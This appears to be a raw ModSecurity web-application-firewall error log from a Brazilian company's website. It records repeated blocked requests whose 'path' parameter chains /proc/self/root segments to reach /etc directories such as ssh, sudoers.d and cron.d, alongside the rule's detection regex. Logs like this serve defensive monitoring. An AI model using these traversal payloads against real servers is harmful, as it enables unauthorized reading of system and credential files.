[Mon Mar 16 14:07:37.987361 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:38174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg42bABkC4fWIHEf8H2VQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:44.008673 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.243.203:56450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg44KTCbgAP5jq5TegyYAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:54.945439 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:58322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg46tSswJuvopo3lOhmjQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:07:57.409504 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:57134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg47bABkC4fWIHEf8H2cQAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:06.159188 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:48462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg49rABkC4fWIHEf8H2eAAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:08:14.423261 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.243.203:57150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg4_njZBu2q05ozVU9glwAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:18.099156 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:42014] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5ArABkC4fWIHEf8H2fgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:19.401951 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:42030] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5A6QpVkWug9HeOt89EwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:21.796832 2026] [:error] [pid 21533:tid 140411649607424] [client 74.7.243.203:33424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5BXjZBu2q05ozVU9gmgAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:34.671770 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.243.203:33428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5EqTCbgAP5jq5TegydgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:45.906674 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:45360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5HbABkC4fWIHEf8H2jAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:46.711435 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:54656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5HrysWC90G-1nBrBMcwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:08:48.455288 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.243.203:49350] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5IKQpVkWug9HeOt89GwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:12.715863 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:49364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5N7ysWC90G-1nBrBMhwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:17.943424 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.243.203:53180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5PaQpVkWug9HeOt89JQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:20.555811 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:51898] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5QJqj1wV0Si-Okef2mQAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:21.779842 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.244.31:54346] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg5QVajLEzk2WiQ-10ZsgAAApU"]
[Mon Mar 16 14:09:23.892928 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.243.203:53190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5Q7ysWC90G-1nBrBMjwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:27.442064 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:53372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5R46lpbStxTqkSkt0GQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:29.790201 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:53380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5SbABkC4fWIHEf8H2oQAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:41.082615 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:33126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5VbABkC4fWIHEf8H2rwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:09:48.669854 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.243.203:54346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5XI6lpbStxTqkSkt0KwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
